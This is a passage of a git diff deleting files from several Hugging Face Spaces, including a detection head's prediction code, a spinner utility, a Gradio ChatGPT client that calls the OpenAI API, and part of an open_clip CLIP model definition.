(List[:obj:`DetDataSample`]): The Data - Samples. It usually includes information such as - `gt_instance`, `gt_panoptic_seg` and `gt_sem_seg`. - rescale (bool, optional): Whether to rescale the results. - Defaults to True. - - Returns: - list[obj:`InstanceData`]: Detection results of each image - after the post process. 
- """ - batch_img_metas = [ - data_samples.metainfo for data_samples in batch_data_samples - ] - - last_layer_hidden_state = hidden_states[-1].unsqueeze(0) - outs = self(last_layer_hidden_state) - - predictions = self.predict_by_feat( - *outs, batch_img_metas=batch_img_metas, rescale=rescale) - - return predictions - - def predict_by_feat(self, - layer_cls_scores: Tensor, - layer_bbox_preds: Tensor, - batch_img_metas: List[dict], - rescale: bool = True) -> InstanceList: - """Transform network outputs for a batch into bbox predictions. - - Args: - layer_cls_scores (Tensor): Classification outputs of the last or - all decoder layer. Each is a 4D-tensor, has shape - (num_decoder_layers, bs, num_queries, cls_out_channels). - layer_bbox_preds (Tensor): Sigmoid regression outputs of the last - or all decoder layer. Each is a 4D-tensor with normalized - coordinate format (cx, cy, w, h) and shape - (num_decoder_layers, bs, num_queries, 4). - batch_img_metas (list[dict]): Meta information of each image. - rescale (bool, optional): If `True`, return boxes in original - image space. Defaults to `True`. - - Returns: - list[:obj:`InstanceData`]: Object detection results of each image - after the post process. Each item usually contains following keys. - - - scores (Tensor): Classification scores, has a shape - (num_instance, ) - - labels (Tensor): Labels of bboxes, has a shape - (num_instances, ). - - bboxes (Tensor): Has a shape (num_instances, 4), - the last dimension 4 arrange as (x1, y1, x2, y2). - """ - # NOTE only using outputs from the last feature level, - # and only the outputs from the last decoder layer is used. 
- cls_scores = layer_cls_scores[-1] - bbox_preds = layer_bbox_preds[-1] - - result_list = [] - for img_id in range(len(batch_img_metas)): - cls_score = cls_scores[img_id] - bbox_pred = bbox_preds[img_id] - img_meta = batch_img_metas[img_id] - results = self._predict_by_feat_single(cls_score, bbox_pred, - img_meta, rescale) - result_list.append(results) - return result_list - - def _predict_by_feat_single(self, - cls_score: Tensor, - bbox_pred: Tensor, - img_meta: dict, - rescale: bool = True) -> InstanceData: - """Transform outputs from the last decoder layer into bbox predictions - for each image. - - Args: - cls_score (Tensor): Box score logits from the last decoder layer - for each image. Shape [num_queries, cls_out_channels]. - bbox_pred (Tensor): Sigmoid outputs from the last decoder layer - for each image, with coordinate format (cx, cy, w, h) and - shape [num_queries, 4]. - img_meta (dict): Image meta info. - rescale (bool): If True, return boxes in original image - space. Default True. - - Returns: - :obj:`InstanceData`: Detection results of each image - after the post process. - Each item usually contains following keys. - - - scores (Tensor): Classification scores, has a shape - (num_instance, ) - - labels (Tensor): Labels of bboxes, has a shape - (num_instances, ). - - bboxes (Tensor): Has a shape (num_instances, 4), - the last dimension 4 arrange as (x1, y1, x2, y2). 
- """ - assert len(cls_score) == len(bbox_pred) # num_queries - max_per_img = self.test_cfg.get('max_per_img', len(cls_score)) - img_shape = img_meta['img_shape'] - # exclude background - if self.loss_cls.use_sigmoid: - cls_score = cls_score.sigmoid() - scores, indexes = cls_score.view(-1).topk(max_per_img) - det_labels = indexes % self.num_classes - bbox_index = indexes // self.num_classes - bbox_pred = bbox_pred[bbox_index] - else: - scores, det_labels = F.softmax(cls_score, dim=-1)[..., :-1].max(-1) - scores, bbox_index = scores.topk(max_per_img) - bbox_pred = bbox_pred[bbox_index] - det_labels = det_labels[bbox_index] - - det_bboxes = bbox_cxcywh_to_xyxy(bbox_pred) - det_bboxes[:, 0::2] = det_bboxes[:, 0::2] * img_shape[1] - det_bboxes[:, 1::2] = det_bboxes[:, 1::2] * img_shape[0] - det_bboxes[:, 0::2].clamp_(min=0, max=img_shape[1]) - det_bboxes[:, 1::2].clamp_(min=0, max=img_shape[0]) - if rescale: - assert img_meta.get('scale_factor') is not None - det_bboxes /= det_bboxes.new_tensor( - img_meta['scale_factor']).repeat((1, 2)) - - results = InstanceData() - results.bboxes = det_bboxes - results.scores = scores - results.labels = det_labels - return results diff --git a/spaces/LLLLLLLyc/anime-remove-background/README.md b/spaces/LLLLLLLyc/anime-remove-background/README.md deleted file mode 100644 index 1ba3cb5ea0e994e246d57b7d62b8aa5a6331901c..0000000000000000000000000000000000000000 --- a/spaces/LLLLLLLyc/anime-remove-background/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Anime Remove Background -emoji: 🪄🖼️ -colorFrom: indigo -colorTo: pink -sdk: gradio -sdk_version: 3.1.4 -app_file: app.py -pinned: false -license: apache-2.0 -duplicated_from: skytnt/anime-remove-background ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Lamai/LAMAIGPT/autogpt/spinner.py b/spaces/Lamai/LAMAIGPT/autogpt/spinner.py deleted file mode 100644 index 
4e33d74213881352546f334ccb1eb4772b8b7b70..0000000000000000000000000000000000000000 --- a/spaces/Lamai/LAMAIGPT/autogpt/spinner.py +++ /dev/null @@ -1,65 +0,0 @@ -"""A simple spinner module""" -import itertools -import sys -import threading -import time - - -class Spinner: - """A simple spinner class""" - - def __init__(self, message: str = "Loading...", delay: float = 0.1) -> None: - """Initialize the spinner class - - Args: - message (str): The message to display. - delay (float): The delay between each spinner update. - """ - self.spinner = itertools.cycle(["-", "/", "|", "\\"]) - self.delay = delay - self.message = message - self.running = False - self.spinner_thread = None - - def spin(self) -> None: - """Spin the spinner""" - while self.running: - sys.stdout.write(f"{next(self.spinner)} {self.message}\r") - sys.stdout.flush() - time.sleep(self.delay) - sys.stdout.write(f"\r{' ' * (len(self.message) + 2)}\r") - - def __enter__(self): - """Start the spinner""" - self.running = True - self.spinner_thread = threading.Thread(target=self.spin) - self.spinner_thread.start() - - return self - - def __exit__(self, exc_type, exc_value, exc_traceback) -> None: - """Stop the spinner - - Args: - exc_type (Exception): The exception type. - exc_value (Exception): The exception value. - exc_traceback (Exception): The exception traceback. 
- """ - self.running = False - if self.spinner_thread is not None: - self.spinner_thread.join() - sys.stdout.write(f"\r{' ' * (len(self.message) + 2)}\r") - sys.stdout.flush() - - def update_message(self, new_message, delay=0.1): - """Update the spinner message - Args: - new_message (str): New message to display - delay: Delay in seconds before updating the message - """ - time.sleep(delay) - sys.stdout.write( - f"\r{' ' * (len(self.message) + 2)}\r" - ) # Clear the current message - sys.stdout.flush() - self.message = new_message diff --git a/spaces/LanQian/ChatGPT/app.py b/spaces/LanQian/ChatGPT/app.py deleted file mode 100644 index c70499db185681e98b1700d30d54ee57633494de..0000000000000000000000000000000000000000 --- a/spaces/LanQian/ChatGPT/app.py +++ /dev/null @@ -1,341 +0,0 @@ -import json -import gradio as gr -# import openai -import os -import sys -import traceback -import requests -# import markdown -import csv - -my_api_key = os.environ["APIKEY"] # 在这里输入你的 API 密钥 -HIDE_MY_KEY = False # 如果你想在UI中隐藏你的 API 密钥,将此值设置为 True - -initial_prompt = "You are a helpful assistant." -API_URL = "https://api.openai.com/v1/chat/completions" -HISTORY_DIR = "history" -TEMPLATES_DIR = "templates" - - - -#if we are running in Docker -if os.environ.get('dockerrun') == 'yes': - dockerflag = True -else: - dockerflag = False - -if dockerflag: - my_api_key = os.environ.get('my_api_key') - if my_api_key == "empty": - print("Please give a api key!") - sys.exit(1) - #auth - username = os.environ.get('USERNAME') - password = os.environ.get('PASSWORD') - if isinstance(username, type(None)) or isinstance(password, type(None)): - authflag = False - else: - authflag = True - - -def parse_text(text): - lines = text.split("\n") - lines = [line for line in lines if line != ""] - count = 0 - firstline = False - for i, line in enumerate(lines): - if "```" in line: - count += 1 - items = line.split('`') - if count % 2 == 1: - lines[i] = f'
<pre><code class="{items[-1]}">'
    -                firstline = True
    -            else:
-                lines[i] = f'<br></code></pre>'
- else: - if i > 0: - if count % 2 == 1: - line = line.replace("&", "&amp;") - line = line.replace("\"", "`\"`") - line = line.replace("\'", "`\'`") - line = line.replace("<", "&lt;") - line = line.replace(">", "&gt;") - line = line.replace(" ", "&nbsp;") - line = line.replace("*", "&ast;") - line = line.replace("_", "&lowbar;") - line = line.replace("#", "&#35;") - line = line.replace("-", "&#45;") - line = line.replace(".", "&#46;") - line = line.replace("!", "&#33;") - line = line.replace("(", "&#40;") - line = line.replace(")", "&#41;") - lines[i] = "<br>
    "+line - text = "".join(lines) - return text - -def predict(inputs, top_p, temperature, openai_api_key, chatbot=[], history=[], system_prompt=initial_prompt, retry=False, summary=False): # repetition_penalty, top_k - - print(f"chatbot 1: {chatbot}") - - headers = { - "Content-Type": "application/json", - "Authorization": f"Bearer {openai_api_key}" - } - - chat_counter = len(history) // 2 - - print(f"chat_counter - {chat_counter}") - - messages = [compose_system(system_prompt)] - if chat_counter: - for data in chatbot: - temp1 = {} - temp1["role"] = "user" - temp1["content"] = data[0] - temp2 = {} - temp2["role"] = "assistant" - temp2["content"] = data[1] - if temp1["content"] != "": - messages.append(temp1) - messages.append(temp2) - else: - messages[-1]['content'] = temp2['content'] - if retry and chat_counter: - messages.pop() - elif summary: - messages.append(compose_user( - "请帮我总结一下上述对话的内容,实现减少字数的同时,保证对话的质量。在总结中不要加入这一句话。")) - history = ["我们刚刚聊了什么?"] - else: - temp3 = {} - temp3["role"] = "user" - temp3["content"] = inputs - messages.append(temp3) - chat_counter += 1 - # messages - payload = { - "model": "gpt-3.5-turbo", - "messages": messages, # [{"role": "user", "content": f"{inputs}"}], - "temperature": temperature, # 1.0, - "top_p": top_p, # 1.0, - "n": 1, - "stream": True, - "presence_penalty": 0, - "frequency_penalty": 0, - } - - if not summary: - history.append(inputs) - print(f"payload is - {payload}") - # make a POST request to the API endpoint using the requests.post method, passing in stream=True - response = requests.post(API_URL, headers=headers, - json=payload, stream=True) - #response = requests.post(API_URL, headers=headers, json=payload, stream=True) - - token_counter = 0 - partial_words = "" - - counter = 0 - chatbot.append((history[-1], "")) - for chunk in response.iter_lines(): - if counter == 0: - counter += 1 - continue - counter += 1 - # check whether each line is non-empty - if chunk: - # decode each line as response data is in bytes 
- try: - if len(json.loads(chunk.decode()[6:])['choices'][0]["delta"]) == 0: - break - except Exception as e: - chatbot.pop() - chatbot.append((history[-1], f"☹️发生了错误
<br>返回值:{response.text}<br>
    异常:{e}")) - history.pop() - yield chatbot, history - break - #print(json.loads(chunk.decode()[6:])['choices'][0]["delta"] ["content"]) - partial_words = partial_words + \ - json.loads(chunk.decode()[6:])[ - 'choices'][0]["delta"]["content"] - if token_counter == 0: - history.append(" " + partial_words) - else: - history[-1] = parse_text(partial_words) - chatbot[-1] = (history[-2], history[-1]) - # chat = [(history[i], history[i + 1]) for i in range(0, len(history) - 1, 2) ] # convert to tuples of list - token_counter += 1 - # resembles {chatbot: chat, state: history} - yield chatbot, history - - - -def delete_last_conversation(chatbot, history): - chatbot.pop() - history.pop() - history.pop() - return chatbot, history - -def save_chat_history(filename, system, history, chatbot): - if filename == "": - return - if not filename.endswith(".json"): - filename += ".json" - os.makedirs(HISTORY_DIR, exist_ok=True) - json_s = {"system": system, "history": history, "chatbot": chatbot} - with open(os.path.join(HISTORY_DIR, filename), "w") as f: - json.dump(json_s, f) - - -def load_chat_history(filename): - with open(os.path.join(HISTORY_DIR, filename), "r") as f: - json_s = json.load(f) - return filename, json_s["system"], json_s["history"], json_s["chatbot"] - - -def get_file_names(dir, plain=False, filetype=".json"): - # find all json files in the current directory and return their names - try: - files = [f for f in os.listdir(dir) if f.endswith(filetype)] - except FileNotFoundError: - files = [] - if plain: - return files - else: - return gr.Dropdown.update(choices=files) - -def get_history_names(plain=False): - return get_file_names(HISTORY_DIR, plain) - -def load_template(filename): - lines = [] - with open(os.path.join(TEMPLATES_DIR, filename), "r", encoding="utf8") as csvfile: - reader = csv.reader(csvfile) - lines = list(reader) - lines = lines[1:] - return {row[0]:row[1] for row in lines}, gr.Dropdown.update(choices=[row[0] for row in lines]) - -def 
get_template_names(plain=False): - return get_file_names(TEMPLATES_DIR, plain, filetype=".csv") - -def reset_state(): - return [], [] - - -def compose_system(system_prompt): - return {"role": "system", "content": system_prompt} - - -def compose_user(user_input): - return {"role": "user", "content": user_input} - - -def reset_textbox(): - return gr.update(value='') - -title = """

    ChatGPT

    """ -description = """
    - - -此App使用 `gpt-3.5-turbo` 大语言模型 -
    -""" -with gr.Blocks() as demo: - gr.HTML(title) - keyTxt = gr.Textbox(show_label=True, placeholder=f"在这里输入你的OpenAI API-key", - value=my_api_key, label="API Key(默认使用LanQian的key)", type="password", visible=not HIDE_MY_KEY).style(container=True) - chatbot = gr.Chatbot() # .style(color_map=("#1D51EE", "#585A5B")) - history = gr.State([]) - promptTemplates = gr.State({}) - TRUECOMSTANT = gr.State(True) - FALSECONSTANT = gr.State(False) - topic = gr.State("未命名对话历史记录") - - with gr.Row(): - with gr.Column(scale=12): - txt = gr.Textbox(show_label=False, placeholder="在这里输入").style( - container=False) - with gr.Column(min_width=50, scale=1): - submitBtn = gr.Button("🚀", variant="primary") - with gr.Row(): - emptyBtn = gr.Button("🧹 新的对话") - retryBtn = gr.Button("🔄 重新生成") - delLastBtn = gr.Button("🗑️ 删除上条对话") - reduceTokenBtn = gr.Button("♻️ 总结对话") - systemPromptTxt = gr.Textbox(show_label=True, placeholder=f"在这里输入System Prompt...", - label="System prompt", value=initial_prompt).style(container=True) - with gr.Accordion(label="加载Prompt模板", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - templateFileSelectDropdown = gr.Dropdown(label="选择Prompt模板集合文件(.csv)", choices=get_template_names(plain=True), multiselect=False) - with gr.Column(scale=1): - templateRefreshBtn = gr.Button("🔄 刷新") - templaeFileReadBtn = gr.Button("📂 读入模板") - with gr.Row(): - with gr.Column(scale=6): - templateSelectDropdown = gr.Dropdown(label="从Prompt模板中加载", choices=[], multiselect=False) - with gr.Column(scale=1): - templateApplyBtn = gr.Button("⬇️ 应用") - with gr.Accordion(label="保存/加载对话历史记录(在文本框中输入文件名,点击“保存对话”按钮,历史记录文件会被存储到Python文件旁边)", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - saveFileName = gr.Textbox( - show_label=True, placeholder=f"在这里输入保存的文件名...", label="设置保存文件名", value="对话历史记录").style(container=True) - with gr.Column(scale=1): - saveBtn = gr.Button("💾 保存对话") - with gr.Row(): - with gr.Column(scale=6): - historyFileSelectDropdown 
= gr.Dropdown(label="从列表中加载对话", choices=get_history_names(plain=True), multiselect=False) - with gr.Column(scale=1): - historyRefreshBtn = gr.Button("🔄 刷新") - historyReadBtn = gr.Button("📂 读入对话") - #inputs, top_p, temperature, top_k, repetition_penalty - with gr.Accordion("参数", open=False): - top_p = gr.Slider(minimum=-0, maximum=1.0, value=1.0, step=0.05, - interactive=True, label="Top-p (nucleus sampling)",) - temperature = gr.Slider(minimum=-0, maximum=5.0, value=0.6, - step=0.1, interactive=True, label="Temperature",) - #top_k = gr.Slider( minimum=1, maximum=50, value=4, step=1, interactive=True, label="Top-k",) - #repetition_penalty = gr.Slider( minimum=0.1, maximum=3.0, value=1.03, step=0.01, interactive=True, label="Repetition Penalty", ) - gr.Markdown(description) - - - txt.submit(predict, [txt, top_p, temperature, keyTxt, - chatbot, history, systemPromptTxt], [chatbot, history]) - txt.submit(reset_textbox, [], [txt]) - submitBtn.click(predict, [txt, top_p, temperature, keyTxt, chatbot, - history, systemPromptTxt], [chatbot, history], show_progress=True) - submitBtn.click(reset_textbox, [], [txt]) - emptyBtn.click(reset_state, outputs=[chatbot, history]) - retryBtn.click(predict, [txt, top_p, temperature, keyTxt, chatbot, history, - systemPromptTxt, TRUECOMSTANT], [chatbot, history], show_progress=True) - delLastBtn.click(delete_last_conversation, [chatbot, history], [ - chatbot, history], show_progress=True) - reduceTokenBtn.click(predict, [txt, top_p, temperature, keyTxt, chatbot, history, - systemPromptTxt, FALSECONSTANT, TRUECOMSTANT], [chatbot, history], show_progress=True) - saveBtn.click(save_chat_history, [ - saveFileName, systemPromptTxt, history, chatbot], None, show_progress=True) - saveBtn.click(get_history_names, None, [historyFileSelectDropdown]) - historyRefreshBtn.click(get_history_names, None, [historyFileSelectDropdown]) - historyReadBtn.click(load_chat_history, [historyFileSelectDropdown], [saveFileName, systemPromptTxt, history, 
chatbot], show_progress=True) - templateRefreshBtn.click(get_template_names, None, [templateFileSelectDropdown]) - templaeFileReadBtn.click(load_template, [templateFileSelectDropdown], [promptTemplates, templateSelectDropdown], show_progress=True) - templateApplyBtn.click(lambda x, y: x[y], [promptTemplates, templateSelectDropdown], [systemPromptTxt], show_progress=True) - -print("温馨提示:访问 http://localhost:7860 查看界面") -# 默认开启本地服务器,默认可以直接从IP访问,默认不创建公开分享链接 -demo.title = "ChatGPT" - -#if running in Docker -if dockerflag: - if authflag: - demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=(username, password)) - else: - demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) -#if not running in Docker -else: - #demo.queue().launch(share=True) # 改为 share=True 可以创建公开分享链接 - #demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) # 可自定义端口 - demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=(os.environ["userpass"], os.environ["userpass"])) # 可设置用户名与密码 diff --git a/spaces/LanguageBind/LanguageBind/open_clip/model.py b/spaces/LanguageBind/LanguageBind/open_clip/model.py deleted file mode 100644 index f85b68ba23117cb65d082cf5cd4cf7528bab4619..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/open_clip/model.py +++ /dev/null @@ -1,473 +0,0 @@ -""" CLIP Model - -Adapted from https://github.com/openai/CLIP. Originally MIT License, Copyright (c) 2021 OpenAI. 
-""" -from dataclasses import dataclass -import logging -import math -from typing import Optional, Tuple, Union - -import numpy as np -import torch -import torch.nn.functional as F -from torch import nn -from torch.utils.checkpoint import checkpoint - -from .hf_model import HFTextEncoder -from .modified_resnet import ModifiedResNet -from .timm_model import TimmModel -from .transformer import LayerNormFp32, LayerNorm, QuickGELU, Attention, VisionTransformer, TextTransformer -from .utils import to_2tuple - - -@dataclass -class CLIPVisionCfg: - layers: Union[Tuple[int, int, int, int], int] = 12 - width: int = 768 - head_width: int = 64 - mlp_ratio: float = 4.0 - patch_size: int = 16 - image_size: Union[Tuple[int, int], int] = 224 - - ls_init_value: Optional[float] = None # layer scale initial value - patch_dropout: float = 0. # what fraction of patches to dropout during training (0 would mean disabled and no patches dropped) - 0.5 to 0.75 recommended in the paper for optimal results - input_patchnorm: bool = False # whether to use dual patchnorm - would only apply the input layernorm on each patch, as post-layernorm already exist in original clip vit design - global_average_pool: bool = False # whether to global average pool the last embedding layer, instead of using CLS token (https://arxiv.org/abs/2205.01580) - attentional_pool: bool = False # whether to use attentional pooler in the last embedding layer - n_queries: int = 256 # n_queries for attentional pooler - attn_pooler_heads: int = 8 # n heads for attentional_pooling - output_tokens: bool = False - - timm_model_name: str = None # a valid model name overrides layers, width, patch_size - timm_model_pretrained: bool = False # use (imagenet) pretrained weights for named model - timm_pool: str = 'avg' # feature pooling for timm model ('abs_attn', 'rot_attn', 'avg', '') - timm_proj: str = 'linear' # linear projection for timm model output ('linear', 'mlp', '') - timm_proj_bias: bool = False # enable bias final 
projection - timm_drop: float = 0. # head dropout - timm_drop_path: Optional[float] = None # backbone stochastic depth - - -@dataclass -class CLIPTextCfg: - context_length: int = 77 - vocab_size: int = 49408 - width: int = 512 - heads: int = 8 - layers: int = 12 - ls_init_value: Optional[float] = None # layer scale initial value - hf_model_name: str = None - hf_tokenizer_name: str = None - hf_model_pretrained: bool = True - proj: str = 'mlp' - pooler_type: str = 'mean_pooler' - embed_cls: bool = False - pad_id: int = 0 - output_tokens: bool = False - - -def get_cast_dtype(precision: str): - cast_dtype = None - if precision == 'bf16': - cast_dtype = torch.bfloat16 - elif precision == 'fp16': - cast_dtype = torch.float16 - return cast_dtype - - -def get_input_dtype(precision: str): - input_dtype = None - if precision in ('bf16', 'pure_bf16'): - input_dtype = torch.bfloat16 - elif precision in ('fp16', 'pure_fp16'): - input_dtype = torch.float16 - return input_dtype - - -def _build_vision_tower( - embed_dim: int, - vision_cfg: CLIPVisionCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None -): - if isinstance(vision_cfg, dict): - vision_cfg = CLIPVisionCfg(**vision_cfg) - - # OpenAI models are pretrained w/ QuickGELU but native nn.GELU is both faster and more - # memory efficient in recent PyTorch releases (>= 1.10). - # NOTE: timm models always use native GELU regardless of quick_gelu flag. 
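
As an aside on the comment above (OpenAI models pretrained with QuickGELU vs. native `nn.GELU`), here is a dependency-free sketch of the two activations — exact GELU via the Gaussian CDF, and QuickGELU as the sigmoid approximation `x * sigmoid(1.702 * x)` used in OpenAI CLIP. This is illustrative only (pure-Python scalars, not torch tensors):

```python
import math

def gelu_exact(x: float) -> float:
    # Exact GELU: x * Phi(x), where Phi is the standard normal CDF.
    return 0.5 * x * (1.0 + math.erf(x / math.sqrt(2.0)))

def quick_gelu(x: float) -> float:
    # QuickGELU as used in OpenAI CLIP: x * sigmoid(1.702 * x).
    return x / (1.0 + math.exp(-1.702 * x))

# The sigmoid approximation tracks exact GELU closely over typical
# activation ranges, which is why swapping in nn.GELU is usually safe
# when fine-tuning (though it is not bit-identical to QuickGELU weights).
max_err = max(abs(gelu_exact(v / 10.0) - quick_gelu(v / 10.0)) for v in range(-60, 61))
print(f"max |GELU - QuickGELU| on [-6, 6]: {max_err:.4f}")
```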
- act_layer = QuickGELU if quick_gelu else nn.GELU - - if vision_cfg.timm_model_name: - visual = TimmModel( - vision_cfg.timm_model_name, - pretrained=vision_cfg.timm_model_pretrained, - pool=vision_cfg.timm_pool, - proj=vision_cfg.timm_proj, - proj_bias=vision_cfg.timm_proj_bias, - drop=vision_cfg.timm_drop, - drop_path=vision_cfg.timm_drop_path, - patch_drop=vision_cfg.patch_dropout if vision_cfg.patch_dropout > 0 else None, - embed_dim=embed_dim, - image_size=vision_cfg.image_size, - ) - elif isinstance(vision_cfg.layers, (tuple, list)): - vision_heads = vision_cfg.width * 32 // vision_cfg.head_width - visual = ModifiedResNet( - layers=vision_cfg.layers, - output_dim=embed_dim, - heads=vision_heads, - image_size=vision_cfg.image_size, - width=vision_cfg.width, - ) - else: - vision_heads = vision_cfg.width // vision_cfg.head_width - norm_layer = LayerNormFp32 if cast_dtype in (torch.float16, torch.bfloat16) else LayerNorm - visual = VisionTransformer( - image_size=vision_cfg.image_size, - patch_size=vision_cfg.patch_size, - width=vision_cfg.width, - layers=vision_cfg.layers, - heads=vision_heads, - mlp_ratio=vision_cfg.mlp_ratio, - ls_init_value=vision_cfg.ls_init_value, - patch_dropout=vision_cfg.patch_dropout, - input_patchnorm=vision_cfg.input_patchnorm, - global_average_pool=vision_cfg.global_average_pool, - attentional_pool=vision_cfg.attentional_pool, - n_queries=vision_cfg.n_queries, - attn_pooler_heads=vision_cfg.attn_pooler_heads, - output_tokens=vision_cfg.output_tokens, - output_dim=embed_dim, - act_layer=act_layer, - norm_layer=norm_layer, - ) - - return visual - - -def _build_text_tower( - embed_dim: int, - text_cfg: CLIPTextCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None, -): - if isinstance(text_cfg, dict): - text_cfg = CLIPTextCfg(**text_cfg) - - if text_cfg.hf_model_name: - text = HFTextEncoder( - text_cfg.hf_model_name, - output_dim=embed_dim, - proj=text_cfg.proj, - pooler_type=text_cfg.pooler_type, - 
pretrained=text_cfg.hf_model_pretrained, - output_tokens=text_cfg.output_tokens, - ) - else: - act_layer = QuickGELU if quick_gelu else nn.GELU - norm_layer = LayerNormFp32 if cast_dtype in (torch.float16, torch.bfloat16) else LayerNorm - - text = TextTransformer( - context_length=text_cfg.context_length, - vocab_size=text_cfg.vocab_size, - width=text_cfg.width, - heads=text_cfg.heads, - layers=text_cfg.layers, - ls_init_value=text_cfg.ls_init_value, - output_dim=embed_dim, - embed_cls=text_cfg.embed_cls, - output_tokens=text_cfg.output_tokens, - pad_id=text_cfg.pad_id, - act_layer=act_layer, - norm_layer=norm_layer, - ) - return text - - -class CLIP(nn.Module): - output_dict: torch.jit.Final[bool] - - def __init__( - self, - embed_dim: int, - vision_cfg: CLIPVisionCfg, - text_cfg: CLIPTextCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None, - output_dict: bool = False, - ): - super().__init__() - self.output_dict = output_dict - self.visual = _build_vision_tower(embed_dim, vision_cfg, quick_gelu, cast_dtype) - - text = _build_text_tower(embed_dim, text_cfg, quick_gelu, cast_dtype) - self.transformer = text.transformer - self.context_length = text.context_length - self.vocab_size = text.vocab_size - self.token_embedding = text.token_embedding - self.positional_embedding = text.positional_embedding - self.ln_final = text.ln_final - self.text_projection = text.text_projection - self.register_buffer('attn_mask', text.attn_mask, persistent=False) - - self.logit_scale = nn.Parameter(torch.ones([]) * np.log(1 / 0.07)) - - def lock_image_tower(self, unlocked_groups=0, freeze_bn_stats=False): - # lock image tower as per LiT - https://arxiv.org/abs/2111.07991 - self.visual.lock(unlocked_groups=unlocked_groups, freeze_bn_stats=freeze_bn_stats) - - @torch.jit.ignore - def set_grad_checkpointing(self, enable=True): - self.visual.set_grad_checkpointing(enable) - self.transformer.grad_checkpointing = enable - - def encode_image(self, image, normalize: 
bool = False): - features = self.visual(image) - return F.normalize(features, dim=-1) if normalize else features - - def encode_text(self, text, normalize: bool = False): - cast_dtype = self.transformer.get_cast_dtype() - - x = self.token_embedding(text).to(cast_dtype) # [batch_size, n_ctx, d_model] - - x = x + self.positional_embedding.to(cast_dtype) - x = x.permute(1, 0, 2) # NLD -> LND - x = self.transformer(x, attn_mask=self.attn_mask) - x = x.permute(1, 0, 2) # LND -> NLD - x = self.ln_final(x) # [batch_size, n_ctx, transformer.width] - # take features from the eot embedding (eot_token is the highest number in each sequence) - x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection - return F.normalize(x, dim=-1) if normalize else x - - def forward( - self, - image: Optional[torch.Tensor] = None, - text: Optional[torch.Tensor] = None, - ): - image_features = self.encode_image(image, normalize=True) if image is not None else None - text_features = self.encode_text(text, normalize=True) if text is not None else None - if self.output_dict: - return { - "image_features": image_features, - "text_features": text_features, - "logit_scale": self.logit_scale.exp() - } - return image_features, text_features, self.logit_scale.exp() - - -class CustomTextCLIP(nn.Module): - output_dict: torch.jit.Final[bool] - - def __init__( - self, - embed_dim: int, - vision_cfg: CLIPVisionCfg, - text_cfg: CLIPTextCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None, - output_dict: bool = False, - ): - super().__init__() - self.output_dict = output_dict - self.visual = _build_vision_tower(embed_dim, vision_cfg, quick_gelu, cast_dtype) - self.text = _build_text_tower(embed_dim, text_cfg, quick_gelu, cast_dtype) - self.context_length = self.text.context_length - self.vocab_size = self.text.vocab_size - self.logit_scale = nn.Parameter(torch.ones([]) * np.log(1 / 0.07)) - - def lock_image_tower(self, unlocked_groups=0, freeze_bn_stats=False): - # 
lock image tower as per LiT - https://arxiv.org/abs/2111.07991 - self.visual.lock(unlocked_groups=unlocked_groups, freeze_bn_stats=freeze_bn_stats) - - def lock_text_tower(self, unlocked_layers: int = 0, freeze_layer_norm: bool = True): - self.text.lock(unlocked_layers, freeze_layer_norm) - - @torch.jit.ignore - def set_grad_checkpointing(self, enable=True): - self.visual.set_grad_checkpointing(enable) - self.text.set_grad_checkpointing(enable) - - def encode_image(self, image, normalize: bool = False): - features = self.visual(image) - return F.normalize(features, dim=-1) if normalize else features - - def encode_text(self, text, normalize: bool = False): - features = self.text(text) - return F.normalize(features, dim=-1) if normalize else features - - def forward( - self, - image: Optional[torch.Tensor] = None, - text: Optional[torch.Tensor] = None, - ): - image_features = self.encode_image(image, normalize=True) if image is not None else None - text_features = self.encode_text(text, normalize=True) if text is not None else None - if self.output_dict: - return { - "image_features": image_features, - "text_features": text_features, - "logit_scale": self.logit_scale.exp() - } - return image_features, text_features, self.logit_scale.exp() - - -def convert_weights_to_lp(model: nn.Module, dtype=torch.float16): - """Convert applicable model parameters to low-precision (bf16 or fp16)""" - - def _convert_weights(l): - if isinstance(l, (nn.Conv1d, nn.Conv2d, nn.Linear)): - l.weight.data = l.weight.data.to(dtype) - if l.bias is not None: - l.bias.data = l.bias.data.to(dtype) - - if isinstance(l, (nn.MultiheadAttention, Attention)): - for attr in [*[f"{s}_proj_weight" for s in ["in", "q", "k", "v"]], "in_proj_bias", "bias_k", "bias_v"]: - tensor = getattr(l, attr) - if tensor is not None: - tensor.data = tensor.data.to(dtype) - - if isinstance(l, (CLIP, TextTransformer)): - # convert text nn.Parameter projections - attr = getattr(l, "text_projection", None) - if attr is not 
None: - attr.data = attr.data.to(dtype) - - if isinstance(l, VisionTransformer): - # convert vision nn.Parameter projections - attr = getattr(l, "proj", None) - if attr is not None: - attr.data = attr.data.to(dtype) - - model.apply(_convert_weights) - - -convert_weights_to_fp16 = convert_weights_to_lp # backwards compat - - -# used to maintain checkpoint compatibility -def convert_to_custom_text_state_dict(state_dict: dict): - if 'text_projection' in state_dict: - # old format state_dict, move text tower -> .text - new_state_dict = {} - for k, v in state_dict.items(): - if any(k.startswith(p) for p in ( - 'text_projection', - 'positional_embedding', - 'token_embedding', - 'transformer', - 'ln_final', - )): - k = 'text.' + k - new_state_dict[k] = v - return new_state_dict - return state_dict - - -def build_model_from_openai_state_dict( - state_dict: dict, - quick_gelu=True, - cast_dtype=torch.float16, -): - vit = "visual.proj" in state_dict - - if vit: - vision_width = state_dict["visual.conv1.weight"].shape[0] - vision_layers = len( - [k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")]) - vision_patch_size = state_dict["visual.conv1.weight"].shape[-1] - grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5) - image_size = vision_patch_size * grid_size - else: - counts: list = [ - len(set(k.split(".")[2] for k in state_dict if 